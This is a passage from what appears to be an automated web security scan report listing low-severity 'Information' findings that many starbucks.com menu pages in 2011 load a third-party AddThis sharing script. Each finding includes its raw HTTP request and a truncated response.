Date: Tue, 08 Feb 2011 03:27:59 GMT
Connection: close
Content-Length: 39700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.74. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:21 GMT
Connection: close
Content-Length: 40012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.75. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:35 GMT
Connection: close
Content-Length: 39780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.76. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:40 GMT
Connection: close
Content-Length: 39676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.77. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/bold-pick-of-the-day

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/bold-pick-of-the-day HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:09 GMT
Connection: close
Content-Length: 41039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.78. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/cafe-misto

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/cafe-misto HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:15 GMT
Connection: close
Content-Length: 41032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.79. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/clover-brewed-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/clover-brewed-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:16 GMT
Connection: close
Content-Length: 40624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.80. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/coffee-traveler

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/coffee-traveler HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:22 GMT
Connection: close
Content-Length: 38969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.81. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/decaf-pike-place-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/decaf-pike-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:04 GMT
Connection: close
Content-Length: 40823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.82. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/iced-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/iced-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:20 GMT
Connection: close
Content-Length: 40920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.83. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/pikes-place-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/pikes-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:02 GMT
Connection: close
Content-Length: 40634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.84. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:12 GMT
Connection: close
Content-Length: 40877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.85. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/peppermint-mocha-hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/peppermint-mocha-hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:15 GMT
Connection: close
Content-Length: 41092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.86. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/salted-caramel-hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/salted-caramel-hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:17 GMT
Connection: close
Content-Length: 41381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.87. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/white-hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/white-hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:19 GMT
Connection: close
Content-Length: 40972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.88. http://www.starbucks.com/menu/drinks/espresso/caffe-americano  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-americano

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caffe-americano HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:33 GMT
Connection: close
Content-Length: 42738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.89. http://www.starbucks.com/menu/drinks/espresso/caffe-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caffe-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:38 GMT
Connection: close
Content-Length: 42513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.90. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caffe-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:43 GMT
Connection: close
Content-Length: 42920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.91. http://www.starbucks.com/menu/drinks/espresso/cappuccino  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cappuccino

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/cappuccino HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:51 GMT
Connection: close
Content-Length: 42663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.92. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-brulee-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caramel-brulee-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:03 GMT
Connection: close
Content-Length: 43212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.93. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caramel-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
